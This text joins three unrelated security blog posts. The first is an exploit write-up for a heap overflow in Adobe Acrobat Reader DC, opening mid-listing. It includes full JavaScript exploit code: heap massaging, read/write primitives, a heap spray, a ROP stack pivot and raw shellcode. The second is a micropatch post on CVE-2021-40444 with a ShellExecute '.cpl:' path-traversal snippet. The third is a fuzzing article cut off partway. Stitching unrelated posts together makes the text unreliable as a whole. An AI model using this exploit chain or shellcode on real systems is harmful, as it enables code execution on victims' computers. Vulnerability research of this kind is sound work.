            if ( v58 )
            {

[14]

              v32 = sub_25802A44((LPCSTR)v6);
              sub_25818C6A((char *)v6, v59, v58 + 1 + v32);
            }
            sub_25802E0C(v6, 0);
            v71 = sub_25802A44((LPCSTR)v6);
            v72 = v6;
            goto LABEL_75;
          }
          v71 = v58;
          v72 = v59;
        }

[Truncated]

LABEL_87:
  if ( v77 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824098 + 12))(v77);
  if ( v76 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824098 + 12))(v76);
  if ( v6 )
    (*(void (__cdecl **)(wchar_t *))(dword_25824098 + 12))(v6);
  return v5;
}

The function listed above receives as parameters a string corresponding to a base URL and a string corresponding to a relative URL, as well as two pointers used to return data to the caller. The two string parameters are shown in the following debugger output.

IA32!PlugInMain+0x168b0:
63ee7d70 55              push    ebp
0:000> dd poi(esp+4) L84
093499c8  7468fffe 3a737074 6f672f2f 656c676f
093499d8  6d6f632e 4141412f 41414141 41414141
093499e8  41414141 41414141 41414141 41414141
093499f8  41414141 41414141 41414141 41414141

[Truncated]

09349b98  41414141 41414141 41414141 41414141
09349ba8  41414141 41414141 41414141 41414141
09349bb8  41414141 41414141 41414141 2f2f3a41
09349bc8  00000000 0009000a 00090009 00090009
0:000> da poi(esp+4) L84
093499c8  "..https://google.com/AAAAAAAAAAA"
093499e8  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
09349a08  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
09349a28  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
09349a48  "AAAA"
0:000> dd poi(esp+8)
0b943ca8  61616262 61616161 61616161 61616161
0b943cb8  61616161 61616161 61616161 61616161
0b943cc8  61616161 61616161 61616161 61616161
0b943cd8  61616161 61616161 61616161 61616161
0b943ce8  61616161 61616161 61616161 61616161
0b943cf8  61616161 61616161 61616161 61616161
0b943d08  61616161 61616161 61616161 61616161
0b943d18  61616161 61616161 61616161 61616161
0:000> da poi(esp+8)
0b943ca8  "bbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943cc8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943ce8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943d08  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

[Truncated]

0b943da8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943dc8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943de8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943e08  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

The debugger output shown above corresponds to an execution of the exploit. It shows the contents of the first and second parameters (esp+4 and esp+8) of the function sub_25817D70. The first parameter contains a Unicode-encoded base URL https://google.com/ (notice the 0xfeff bytes at the start of the string), while the second parameter contains an ASCII string corresponding to the relative URL. Both contain a number of repeated bytes that serve as padding to control the allocation size needed to hold them, which is useful for exploitation.

At [1] a check is made to ascertain whether the second parameter (i.e. the relative URL) is a valid UTF-16BE encoded Unicode string. If it is valid, the length of that string is calculated at [2] and stored in v78[1]. If it is not a valid UTF-16BE encoded string, v78[1] is set to 0 at [3]. The function that calculates the Unicode string length, sub_2581890C(), performs additional checks to ensure that the string passed as a parameter is a valid UTF-16BE encoded string. The following listing shows the decompiled code of this function.

int __cdecl sub_2581890C(char *a1)
{
  char *v1; // eax
  char v2; // cl
  int v3; // esi
  char v4; // bl
  char *v5; // eax
  int result; // eax

  v1 = a1;
  if ( !a1 || *a1 != (char)0xFE || a1[1] != (char)0xFF )
    goto LABEL_12;
  v2 = 0;
  v3 = 0;
  do
  {
    v4 = *v1;
    v5 = v1 + 1;
    if ( !v5 )
      break;
    v2 = *v5;
    v1 = v5 + 1;
    if ( !v4 )
      goto LABEL_10;
    if ( !v2 )
      break;
    v3 += 2;
  }
  while ( v1 );
  if ( v4 )
    goto LABEL_12;
LABEL_10:
  if ( !v2 )
    result = v3;
  else
LABEL_12:
    result = -1;
  return result;
}

The code listed above returns the length of the UTF-16BE encoded string passed as a parameter. Additionally, it implicitly performs the following checks to ensure the string has a valid UTF-16BE encoding:

  • The string must terminate with a double null byte.
  • The words composing the string that are not the terminator must not contain a null byte.

If any of the checks above fail, the function returns -1.

Continuing with the first function mentioned in this section, at [4] the same checks already described are applied to the first parameter (i.e. the base URL). At [5] the length of the Source variable (i.e. the base URL) is calculated, taking into account its encoding. The function sub_25802A44() is an implementation of strlen() that works for both Unicode and ANSI encoded strings. At [6] an allocation of the size of the Source variable is performed by calling sub_25802CD5(), which is an implementation of the well-known calloc() function. Then, at [7], the contents of the Source variable are copied into this new allocation using sub_25802D98(), which is an implementation of strncpy that works for both Unicode and ANSI encoded strings. The same operations performed on the Source variable are then performed on the lpString variable (i.e. the relative URL) at [8], [9], and [10].

The function at [11], sub_25802400(), receives a URL or a part of it and performs some validation and processing. This function is called on both base and relative URLs.

At [12] an allocation of the size required to host the concatenation of the relative URL and the base URL is performed. The lengths provided are calculated in the function called at [11]. For the sake of simplicity this is illustrated with an example: the following debugger output shows the values of the parameters to sub_25802CD5 that correspond to the number of elements to be allocated and the size of each element. In this case the size is the sum of the lengths of the base and relative URLs.

eax=00002600 ebx=00000000 ecx=00002400 edx=00000000 esi=010fd228 edi=00000001
eip=61912cd5 esp=010fd0e4 ebp=010fd1dc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
IA32!PlugInMain+0x1815:
61912cd5 55              push    ebp
0:000> dd esp+4 L1
010fd0e8  00000001
0:000> dd esp+8 L1
010fd0ec  00002600

Afterwards, at [13] the base URL is copied into the memory allocated to host the concatenation and at [14] its length is calculated and provided as a parameter to the call to sub_25818C6A. This function implements string concatenation for both Unicode and ANSI strings. The call to this function at [14] provides the base URL as the first parameter, the relative URL as the second parameter and the expected full size of the concatenation as the third. This function is listed below.

int __cdecl sub_25818C6A(char *Destination, char *Source, int a3)
{
  int result; // eax
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !Destination || !Source || !a3 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240A4 + 4))(*(_DWORD *)(dword_258240A4 + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[15]

  pExceptionObject = sub_25802A44(Destination);
  if ( pExceptionObject + sub_25802A44(Source) <= (unsigned int)(a3 - 1) )
  {

[16]

    sub_258189D6(Destination, Source);
    result = 1;
  }
  else
  {

[17]

    strncat(Destination, Source, a3 - pExceptionObject - 1);
    result = 0;
    Destination[a3 - 1] = 0;
  }
  return result;
}

In the above listing, at [15] the length of the destination string is calculated. The code then checks whether the length of the destination string plus the length of the source string is less than or equal to the desired concatenation length minus one. If the check passes, the function sub_258189D6 is called at [16]. Otherwise the strncat function at [17] is called.

The function sub_258189D6 called at [16] implements the actual string concatenation that works for both Unicode and ANSI strings.

LPSTR __cdecl sub_258189D6(LPSTR lpString1, LPCSTR lpString2)
{
  int v3; // eax
  LPCSTR v4; // edx
  CHAR *v5; // ecx
  CHAR v6; // al
  CHAR v7; // bl
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !lpString1 || !lpString2 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240A4 + 4))(*(_DWORD *)(dword_258240A4 + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[18]

  if ( *lpString1 == (CHAR)0xFE && lpString1[1] == (CHAR)0xFF )
  {

[19]

    v3 = sub_25802A44(lpString1);
    v4 = lpString2 + 2;
    v5 = &lpString1[v3];
    do
    {
      do
      {
        v6 = *v4;
        v4 += 2;
        *v5 = v6;
        v5 += 2;
        v7 = *(v4 - 1);
        *(v5 - 1) = v7;
      }
      while ( v6 );
    }
    while ( v7 );
  }
  else
  {

[20]

    lstrcatA(lpString1, lpString2);
  }
  return lpString1;
}

In the function listed above, at [18] the first parameter (the destination) is checked for the Unicode BOM marker 0xFEFF. If the destination string is Unicode the code proceeds to [19]. There, the source string is appended at the end of the destination string two bytes at a time. If the destination string is ANSI, then the known lstrcatA function is called at [20].

It becomes clear that in the event that the destination string is Unicode and the source string is ANSI, for each character of the ANSI string two bytes are actually copied. This causes an out-of-bounds read of the size of the ANSI string that becomes a heap buffer overflow of the same size once the bytes are copied.

Exploitation

We’ll now walk through how this vulnerability can be exploited to achieve arbitrary code execution. 

Adobe Acrobat Reader DC version 2021.005.20048 running on Windows 10 x64 was used to develop the exploit. Note that Adobe Acrobat Reader DC is a 32-bit application. A successful exploit strategy needs to contend with the following security mitigations on the target:

  • Address Space Layout Randomization (ASLR)
  • Data Execution Prevention (DEP)
  • Control Flow Guard (CFG)

The exploit does not bypass the following protection mechanisms:

  • Control Flow Guard (CFG): CFG must be disabled on the Windows machine for this exploit to work. This can be done from the Exploit Protection settings of Windows 10, by setting the Control Flow Guard (CFG) option to "Off by default".

In order to exploit this vulnerability bypassing ASLR and DEP, the following strategy is adopted:

  1. Prepare the heap layout to allow controlling the memory areas adjacent to the allocations made for the base URL and the relative URL. This involves performing enough allocations to activate the Low Fragmentation Heap bucket for the two sizes, and enough allocations to entirely fit a UserBlock. The allocations with the same size as the base URL allocation must contain an ArrayBuffer object, while the allocations with the same size as the relative URL must have the data required to overwrite the byteLength field of one of those ArrayBuffer objects with the value 0xffff.
  2. Poke some holes on the UserBlock by nullifying the reference to some of the recently allocated memory chunks.
  3. Trigger the garbage collector to free the memory chunks referenced by the nullified objects. This provides room for the base URL and relative URL allocations.
  4. Trigger the heap buffer overflow vulnerability, so the data in the memory chunk adjacent to the relative URL will be copied to the memory chunk adjacent to the base URL.
  5. If everything worked, step 4 should have overwritten the byteLength of one of the controlled ArrayBuffer objects. When a DataView object is created on the corrupted ArrayBuffer it is possible to read and write memory beyond the underlying allocation. This provides a precise way of overwriting the byteLength of the next ArrayBuffer with the value 0xffffffff. Creating a DataView object on this last ArrayBuffer allows reading and writing memory arbitrarily, but relative to where the ArrayBuffer is.
  6. Using the R/W primitive built, walk the NT Heap structure to identify the BusyBitmap.Buffer pointer. This allows knowing the absolute address of the corrupted ArrayBuffer and building an arbitrary read and write primitive that allows reading from and writing to absolute addresses.
  7. To bypass DEP it is required to pivot the stack to a controlled memory area. This is done by using a ROP gadget that writes a fixed value to the ESP register.
  8. Spray the heap with ArrayBuffer objects with the correct size so they are adjacent to each other. This should place a controlled allocation at the address pointed by the stack-pivoting ROP gadget.
  9. Use the arbitrary read and write to write shellcode in a controlled memory area, and to write the ROP chain to execute VirtualProtect to enable execution permissions on the memory area where the shellcode was written.
  10. Overwrite a function pointer of the DataView object used in the read and write primitive and trigger its call to hijack the execution flow.

The following sub-sections break down the exploit code with explanations for better understanding.

Preparing the Heap Layout

The size of the strings involved in this vulnerability can be controlled. This is convenient since it allows selecting the right size for each of them so they are handled by the Low Fragmentation Heap. The inner workings of the Low Fragmentation Heap (LFH) can be leveraged to increase the determinism of the memory layout required to exploit this vulnerability. Selecting a size that is not used in the program allows full control to activate the LFH bucket corresponding to it, and perform the exact number of allocations required to fit one UserBlock.

The memory chunks within a UserBlock are returned to the user randomly when an allocation is performed. The ideal layout required to exploit this vulnerability is having free chunks adjacent to controlled chunks, so when the strings required to trigger the vulnerability are allocated they fall in one of those free chunks.

In order to set up such a layout, 0xd+0x11 ArrayBuffers of size 0x2608-0x10-0x8 are allocated. The first 0x11 allocations are used to enable the LFH bucket, and the next 0xd allocations are used to fill a UserBlock (note that the number of chunks in the first UserBlock for that bucket size is not always 0xd, so this technique is not 100% effective). The ArrayBuffer size is selected so the underlying allocation is of size 0x2608 (including the chunk metadata), which corresponds to an LFH bucket not used by the application.

Then, the same procedure is done but allocating strings whose underlying allocation size is 0x2408, instead of allocating ArrayBuffers. The number of allocations to fit a UserBlock for this size can be 0xe.

The strings should contain the bytes required to overwrite the byteLength property of the ArrayBuffer that is corrupted once the vulnerability is triggered. The value that will overwrite the byteLength property is 0xffff. This is not enough to leverage the ArrayBuffer to read and write the whole range of memory addresses in the process. However, it is not possible to directly overwrite the byteLength with the value 0xffffffff, since that would require overwriting the pointer of its DataView object with a non-zero value, which would corrupt it and break its functionality. Writing only 0xffff avoids touching the DataView object pointer and keeps its functionality intact, because the two leading null bytes of the value are treated as the Unicode string terminator during the concatenation operation.

function massageHeap() {

[1]

    var arrayBuffers = new Array(0xd+0x11);
    for (var i = 0; i < arrayBuffers.length; i++) {
        arrayBuffers[i] = new ArrayBuffer(0x2608-0x10-0x8);
        var dv = new DataView(arrayBuffers[i]);
    }

[2]

    var holeDistance = (arrayBuffers.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= arrayBuffers.length; i += holeDistance) {
        arrayBuffers[i] = null;
    }


[3]

    var strings = new Array(0xe+0x11);
    var str = unescape('%u9090%u4140%u4041%uFFFF%u0000') + unescape('%0000%u0000') + unescape('%u9090%u9090').repeat(0x2408);
    for (var i = 0; i < strings.length; i++) {
        strings[i] = str.substring(0, (0x2408-0x8)/2 - 2).toUpperCase();
    }


[4]

    var holeDistance = (strings.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= strings.length; i += holeDistance) {
        strings[i] = null;
    }

    return arrayBuffers;
}

In the listing above, the ArrayBuffer allocations are created in [1]. Then in [2] two pointers to the created allocations are nullified in order to attempt to create free chunks surrounded by controlled chunks.

At [3] and [4] the same steps are done with the allocated strings.

Triggering the Vulnerability

Triggering the vulnerability is as easy as calling the app.launchURL JavaScript function. Internally, the relative URL provided as a parameter is concatenated to the base URL defined in the PDF document catalog, thus executing the vulnerable function explained in the Code Analysis section of this post.

function triggerHeapOverflow() {
    try {
        app.launchURL('bb' + 'a'.repeat(0x2608 - 2 - 0x200 - 1 -0x8));
    } catch(err) {}
}

The size of the allocation holding the relative URL string must be the same as the one used when preparing the heap layout so it occupies one of the freed spots, and ideally having a controlled allocation adjacent to it.

Obtaining an Arbitrary Read / Write Primitive

When the proper heap layout is successfully achieved and the vulnerability has been triggered, the byteLength property of one ArrayBuffer will have been corrupted with the value 0xffff. This allows writing past the boundaries of the underlying memory allocation and overwriting the byteLength property of the next ArrayBuffer. Finally, creating a DataView object on this last corrupted buffer allows reading from and writing to the whole memory address range of the process in a relative manner.

In order to be able to read from and write to absolute addresses, the memory address of the corrupted ArrayBuffer must be obtained. One way of doing this is to leverage the NT Heap metadata structures to leak a pointer to the same structure. It is relevant that the chunk header contains the chunk number and that all the chunks in a UserBlock are consecutive and adjacent. In addition, the sizes of the chunks are known, so it is possible to compute the distance from the origin of the relative read and write primitive to the pointer to leak. In an analogous manner, since the distance is known, once the pointer is leaked the distance can be subtracted from it to obtain the address of the origin of the read and write primitive.

The following function implements the process described in this subsection.

function getArbitraryRW(arrayBuffers) {

[1]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == 0xffff) {
            var dv = new DataView(arrayBuffers[i]);
            dv.setUint32(0x25f0+0xc, 0xffffffff, true);
        }
    }

[2]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == -1) {
            var rw = new DataView(arrayBuffers[i]);
            corruptedBuffer = arrayBuffers[i];
        }
    }

[3]

    if (rw) {
        var chunkNumber = rw.getUint8(0xffffffff+0x1-0x13, true);
        var chunkSize = 0x25f0+0x10+8;

        var distanceToBitmapBuffer = (chunkSize * chunkNumber) + 0x18 + 8;
        var bitmapBufferPtr = rw.getUint32(0xffffffff+0x1-distanceToBitmapBuffer, true);

        startAddr = bitmapBufferPtr + distanceToBitmapBuffer-4;
        return rw;
    }
    return rw;
}

The function above at [1] tries to locate the initial corrupted ArrayBuffer and leverages it to corrupt the adjacent ArrayBuffer. At [2] it tries to locate the recently corrupted ArrayBuffer and build the relative arbitrary read and write primitive by creating a DataView object on it. Finally, at [3] the aforementioned method of obtaining the absolute address of the origin of the relative read and write primitive is implemented.

Once the origin address of the read and write primitive is known it is possible to use the following helper functions to read and write to any address of the process that has mapped memory.

function readUint32(dataView, absoluteAddress) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    return dataView.getUint32(addrOffset, true);
}

function writeUint32(dataView, absoluteAddress, data) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    dataView.setUint32(addrOffset, data, true);
}

Spraying ArrayBuffer Objects

The heap spray technique performs a large number of controlled allocations with the intention of having adjacent regions of controllable memory. The key to obtaining adjacent memory regions is to make the allocations of a specific size.

In JavaScript, a convenient way of making allocations in the heap whose content is completely controlled is by using ArrayBuffer objects. The memory allocated with these objects can be read from and written to with the use of DataView objects.

In order to get heap allocations of the right size, the metadata of ArrayBuffer objects and heap chunks has to be taken into consideration. The internal representation of ArrayBuffer objects shows that the size of their metadata is 0x10 bytes, while the metadata of a busy heap chunk is 8 bytes.

Since the objective is to have adjacent memory regions filled with controlled data, the allocations performed must have the exact same size as the heap segment size, which is 0x10000 bytes. Therefore, the ArrayBuffer objects created during the heap spray must be 0xffe8 bytes (0x10000 minus 0x10 bytes of ArrayBuffer metadata and 0x8 bytes of chunk metadata).

function sprayHeap() {
    var heapSegmentSize = 0x10000;

[1]

    heapSpray = new Array(0x8000);
    for (var i = 0; i < 0x8000; i++) {
        heapSpray[i] = new ArrayBuffer(heapSegmentSize-0x10-0x8);
        var tmpDv = new DataView(heapSpray[i]);
        tmpDv.setUint32(0, 0xdeadbabe, true);
    }
}

The exploit function listed above performs the ArrayBuffer spray. The total size of the spray defined in [1] was determined by choosing a number high enough that an ArrayBuffer would end up allocated at the predictable address targeted by the stack-pivot ROP gadget used.

The purpose of these allocations is to have a controllable memory region at the address where the stack is relocated after the stack pivot executes. This area can be used to prepare the call to VirtualProtect to enable execution permissions on the memory page where the shellcode is written.

Hijacking the Execution Flow and Executing Arbitrary Code

With the ability to arbitrarily read and write memory, the next steps are preparing the shellcode, writing it, and executing it. The security mitigations present in the application determine the strategy and techniques required. ASLR and DEP force using Return Oriented Programming (ROP) combined with leaked pointers to the relevant modules.

Taking this into account, the strategy can be the following:

  1. Obtain pointers to the relevant modules to calculate their base addresses.
  2. Pivot the stack to a memory region under our control where the addresses of the ROP gadgets can be written.
  3. Write the shellcode.
  4. Call VirtualProtect to change the shellcode memory region permissions to allow execution.
  5. Overwrite a function pointer that can be called later from JavaScript.

The following functions are used in the implementation of the mentioned strategy.

[1]

function getAddressLeaks(rw) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var escriptAddrDelta = 0x275518;
    var escriptAddr = readUint32(rw, dataViewObjPtr+0xc) - escriptAddrDelta;

    var kernel32BaseDelta = 0x273eb8;
    var kernel32Addr = readUint32(rw, escriptAddr + kernel32BaseDelta);

    return [escriptAddr, kernel32Addr];
}
 
[2]

function prepareNewStack(kernel32Addr) {

    var virtualProtectStubDelta = 0x20420;
    writeUint32(rw, newStackAddr, kernel32Addr + virtualProtectStubDelta);

    var shellcode = [0x0082e8fc, 0x89600000, 0x64c031e5, 0x8b30508b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0x3cacff31,
        0x2c027c61, 0x0dcfc120, 0xf2e2c701, 0x528b5752, 0x3c4a8b10, 0x78114c8b, 0xd10148e3, 0x20598b51,
        0x498bd301, 0x493ae318, 0x018b348b, 0xacff31d6, 0x010dcfc1, 0x75e038c7, 0xf87d03f6, 0x75247d3b,
        0x588b58e4, 0x66d30124, 0x8b4b0c8b, 0xd3011c58, 0x018b048b, 0x244489d0, 0x615b5b24, 0xff515a59,
        0x5a5f5fe0, 0x8deb128b, 0x8d016a5d, 0x0000b285, 0x31685000, 0xff876f8b, 0xb5f0bbd5, 0xa66856a2,
        0xff9dbd95, 0x7c063cd5, 0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300, 0x636c6163, 0x6578652e,
        0x00000000]


[3]

    var shellcode_size = shellcode.length * 4;
    writeUint32(rw, newStackAddr + 4 , startAddr);
    writeUint32(rw, newStackAddr + 8, startAddr);
    writeUint32(rw, newStackAddr + 0xc, shellcode_size);
    writeUint32(rw, newStackAddr + 0x10, 0x40);
    writeUint32(rw, newStackAddr + 0x14, startAddr + shellcode_size);

[4]

    for (var i = 0; i < shellcode.length; i++) {
        writeUint32(rw, startAddr+i*4, shellcode[i]);
    }

}

[5]

function hijackEIP(rw, escriptAddr) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var dvShape = readUint32(rw, dataViewObjPtr);
    var dvShapeBase = readUint32(rw, dvShape);
    var dvShapeBaseClasp = readUint32(rw, dvShapeBase);

    var stackPivotGadgetAddr = 0x2de29 + escriptAddr;

    writeUint32(rw, dvShapeBaseClasp+0x10, stackPivotGadgetAddr);

    var foo = rw.execFlowHijack;
}

In the code listing above, the function at [1] obtains the base addresses of the EScript.api and kernel32.dll modules, which are the ones required to exploit the vulnerability with the current strategy. The function at [2] is used to prepare the contents of the relocated stack, so that once the stack pivot is executed everything is ready. In particular, at [3] the address to the shellcode and the parameters to VirtualProtect are written. The address to the shellcode corresponds to the return address that the ret instruction of the VirtualProtect will restore, redirecting this way the execution flow to the shellcode. The shellcode is written at [4].

Finally, at [5] the getProperty function pointer of a DataView object under control is overwritten with the address of the ROP gadget used to pivot the stack, and a property of the object is accessed which triggers the execution of getProperty.

The stack pivot gadget used is from the EScript.api module, and is listed below:

0x2382de29: mov esp, 0x5d0013c2; ret;

When the instructions listed above are executed, the stack will be relocated to 0x5d0013c2 where the previously prepared allocation would be.

Conclusion

We hope you enjoyed reading this analysis of a heap buffer overflow and learned something new. If you’re hungry for more, go and check out our other blog posts!


Micropatches for the "File Extension" URL Scheme (CVE-2021-40444)

by Mitja Kolsek, the 0patch Team

September 2021 Windows Updates brought a fix for CVE-2021-40444, a critical vulnerability in Windows that allowed a malicious Office document to download a remote executable file and execute it locally upon opening the document. This vulnerability was found being exploited in the wild.

 

The Vulnerability

Unfortunately, CVE-2021-40444 does not cover just one flaw but two; this can lead to some confusion:

  1. Path traversal in CAB file extraction: The exploit was utilizing this flaw to place a malicious executable file in a known location instead of a randomly-named subfolder, where it would originally be extracted.

  2. "File extension" URL scheme: For some reason, the Windows ShellExecute function, a very complex function capable of launching local applications in various ways including via URLs, supported an undocumented URL scheme mapped to registered file extensions on the computer. The exploit used this "feature" to launch the previously downloaded executable file with the Control Panel application, having it executed via the URL ".cpl:../../../../../Temp/championship.cpl". In this case, ".cpl" was considered a URL scheme, and since the .cpl extension is associated with control.exe, this application would get launched and given the provided path as an argument.

The second flaw is the more critical one, as there may exist various other ways to get a malicious file onto a user's computer (e.g., via the Downloads folder) and still exploit this second flaw to execute such a file.
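
To illustrate the second flaw in isolation, the snippet below shows the kind of call that ultimately gets made on the victim's machine. It is a minimal sketch of the pre-patch behavior, not code from the actual exploit: on an unpatched system, ShellExecute treats ".cpl" as a "file extension" scheme, resolves it to control.exe, and passes the rest of the URL (here the path used by the in-the-wild exploit) as an argument.

#include <windows.h>
#include <shellapi.h>

int main(void)
{
    /* On an unpatched system, the undocumented "file extension" URL scheme
       causes ".cpl" to be resolved via its registered handler (control.exe),
       which then loads the attacker-controlled .cpl file as a DLL. */
    ShellExecuteA(NULL, "open",
                  ".cpl:../../../../../Temp/championship.cpl",
                  NULL, NULL, SW_SHOWNORMAL);
    return 0;
}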

 

Microsoft's Patch

What Microsoft's patch did was add a check before calling ShellExecute on the provided URL to block URL schemes beginning with a non-alphanumeric character (thereby blocking schemes beginning with a dot, such as ".cpl"), and to further limit the allowed set of characters in the remainder of the string.

Note that the ShellExecute function itself was not patched, and you can still launch a DLL via the Control Panel app by clicking the Windows Start button and typing in a ".cpl:/..." URL. Effectively, therefore, support for the "File extension" URL scheme was not eliminated across Windows as a whole, just made inaccessible from applications utilizing Internet Explorer components for opening URLs. Hopefully, remotely delivered content can't find some other path to ShellExecute that bypasses this new security check.


Our Micropatch

Microsoft's update fixed both flaws, but we decided to only patch the "File extension" URL scheme flaw until someone demonstrates the first flaw to be exploitable by itself.

The "File extension" URL scheme flaw was actually present in two places, in mshtml.dll (reachable from Office documents) and in ieframe.dll (reachable from Internet Explorer), so we had to patch both these executables.

Since an official vendor fix is available, it was our goal to provide patches for affected Windows versions that we have "security-adopted", as they're not receiving official vendor patches anymore. Among these, our tests have shown that only Windows 10 v1803 and v1809 were affected; the File Extension URL scheme "feature" was apparently added in Windows 8.1.

We expect many Windows 10 v1903 machines out there may also be affected, so we decided to port the micropatch to this version as well.

Our CVE-2021-40444 micropatches are therefore available for: 

  1. Windows 10 v1803 32bit or 64bit (updated with May 2021 Updates - latest before end of support)
  2. Windows 10 v1809 32bit or 64bit (updated with May 2021 Updates - latest before end of support) 
  3. Windows 10 v1903 32bit or 64bit (updated with December 2020 Updates - latest before end of support) 


Below is a video of our patch in action. Notice that with 0patch disabled, Calculator is launched both upon opening the Word document and upon previewing the RTF document in Windows Explorer Preview. In both cases, Process Monitor shows that control.exe gets launched, which loads the "malicious" executable, in our case spawning Calculator. With 0patch enabled, control.exe does not get launched, and therefore neither does Calculator.




In line with our guidelines, these patches require a PRO license. To obtain them and have them applied on your computer(s) along with other micropatches included with a PRO license, create an account in 0patch Central, install 0patch Agent and register it to your account, then purchase 0patch PRO.
For a free trial, contact [email protected].
 
Note that no computer restart is needed for installing the agent or applying/un-applying any 0patch micropatches.

We'd like to thank Will Dormann for an in-depth public analysis of this vulnerability, which helped us create a micropatch and protect our users.

To learn more about 0patch, please visit our Help Center.

Fuzzing Closed-Source JavaScript Engines with Coverage Feedback

Posted by Ivan Fratric, Project Zero

tl;dr I combined Fuzzilli (an open-source JavaScript engine fuzzer), with TinyInst (an open-source dynamic instrumentation library for fuzzing). I also added grammar-based mutation support to Jackalope (my black-box binary fuzzer). So far, these two approaches resulted in finding three security issues in jscript9.dll (default JavaScript engine used by Internet Explorer).

Introduction or “when you can’t beat them, join them”

In the past, I’ve invested a lot of time in generation-based fuzzing, which was a successful way to find vulnerabilities in various targets, especially those that take some form of language as input. For example, Domato, my grammar-based generational fuzzer, found over 40 vulnerabilities in WebKit and numerous bugs in Jscript. 

While generation-based fuzzing is still a good way to fuzz many complex targets, it was demonstrated that, for finding vulnerabilities in modern JavaScript engines, especially engines with JIT compilers, better results can be achieved with mutational, coverage-guided approaches. My colleague Samuel Groß makes a compelling case for why that is in his OffensiveCon talk. Samuel is also the author of Fuzzilli, an open-source JavaScript engine fuzzer based on mutating a custom intermediate language. Fuzzilli has found a large number of bugs in various JavaScript engines.

While there has been a lot of development on coverage-guided fuzzers over the last few years, most of the public tooling focuses on open-source targets or software running on the Linux operating system. Meanwhile, I focused on developing tooling for fuzzing of closed-source binaries on operating systems where such software is more prevalent (currently Windows and macOS). Some years back, I published WinAFL, the first performant AFL-based fuzzer for Windows. About a year and a half ago, however, I started working on a brand new toolset for black-box coverage-guided fuzzing. TinyInst and Jackalope are the two outcomes of this effort.

It comes somewhat naturally to combine the tooling I’ve been working on with techniques that have been so successful in finding JavaScript bugs, and try to use the resulting tooling to fuzz JavaScript engines for which the source code is not available. Of such engines, I know two: jscript and jscript9 (implemented in jscript.dll and jscript9.dll) on Windows, which are both used by the Internet Explorer web browser. Of these two, jscript9 is probably more interesting in the context of mutational coverage-guided fuzzing since it includes a JIT compiler and more advanced engine features.

While you might think that Internet Explorer is a thing of the past and it doesn’t make sense to spend energy looking for bugs in it, the fact remains that Internet Explorer is still heavily exploited by real-world attackers. In 2020 there were two Internet Explorer 0days exploited in the wild and three in 2021 so far. One of these vulnerabilities was in the JIT compiler of jscript9. I’ve personally vowed several times that I’m done looking into Internet Explorer, but each time, more 0days in the wild pop up and I change my mind.

Additionally, the techniques described here could be applied to any closed-source or even open-source software, not just Internet Explorer. In particular, grammar-based mutational fuzzing described two sections down can be applied to targets other than JavaScript engines by simply changing the input grammar.

Approach 1: Fuzzilli + TinyInst

Fuzzilli, as said above, is a state-of-the-art JavaScript engine fuzzer and TinyInst is a dynamic instrumentation library. Although TinyInst is general-purpose and could be used in other applications, it comes with various features useful for fuzzing, such as out-of-the-box support for persistent fuzzing, various types of coverage instrumentation, etc. TinyInst is meant to be simple to integrate with other software, in particular fuzzers, and has already been integrated with some.

So, integrating with Fuzzilli was meant to be simple. However, there were still various challenges to overcome for different reasons:

Challenge 1: Getting Fuzzilli to build on Windows where our targets are.

Edit 2021-09-20: The version of Swift for Windows used in this project was from January 2021, when I first started working on it. Since version 5.4, Swift Package Manager is supported on Windows, so building Swift code should be much easier now. Additionally, static linking is supported for C/C++ code.

Fuzzilli was written in Swift and the support for Swift on Windows is currently not great. While Swift on Windows builds exist (I’m linking to the builds by Saleem Abdulrasool instead of the official ones because the latter didn’t work for me), not all features that you would find on Linux and macOS are there. For example, one does not simply run swift build on Windows, as the build system is one of the features that didn’t get ported (yet). Fortunately, CMake and Ninja  support Swift, so the solution to this problem is to switch to the CMake build system. There are helpful examples on how to do this, once again from Saleem Abdulrasool.

